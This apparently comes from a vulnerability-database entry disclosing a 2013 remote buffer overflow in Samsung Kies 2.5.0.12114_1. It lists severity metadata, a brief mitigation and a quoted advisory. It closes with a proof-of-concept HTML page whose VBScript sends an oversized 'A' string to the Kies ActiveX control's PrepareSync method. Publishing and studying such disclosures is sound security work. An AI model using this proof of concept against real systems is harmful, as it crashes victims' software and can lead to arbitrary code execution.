Remote Buffer Overflow Vulnerability in Samsung Kies

vendor:

Kies

by:

High-Tech Bridge Security Research Lab

7,5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Kies

Affected Version From: 2.5.0.12114_1

Affected Version To: 2.5.0.12114_1

Patch Exists: YES

Related CWE: N/A

CPE: a:samsung:kies

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

Remote Buffer Overflow Vulnerability in Samsung Kies

Samsung Kies is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer. Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition.

Mitigation:

Input validation should be used to prevent buffer overflow attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/57249/info

Samsung Kies is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer.

Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition. 

<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title>Remote Buffer Overflow Vulnerability in Samsung Kies v. 
2.5.0.12114_1 </title>
</head>
<script language='vbscript'>
Sub PoC()
arg1="defaultV"
arg2=String(14356, "A")
arg3=1
arg4=1
Target.PrepareSync arg1 ,arg2 ,arg3 ,arg4
End Sub
</script>
<body>
<h3>Remote Buffer Overflow Vulnerability in Samsung Kies by High-Tech 
Bridge Security Research Lab</h3>
<input language=VBScript onclick=PoC() type=button value="Proof of 
Concept">
</body>
<object 
classid='clsid:EA8A3985-F9DF-4652-A255-E4E7772AFCA8'id='Target'></object>
</html>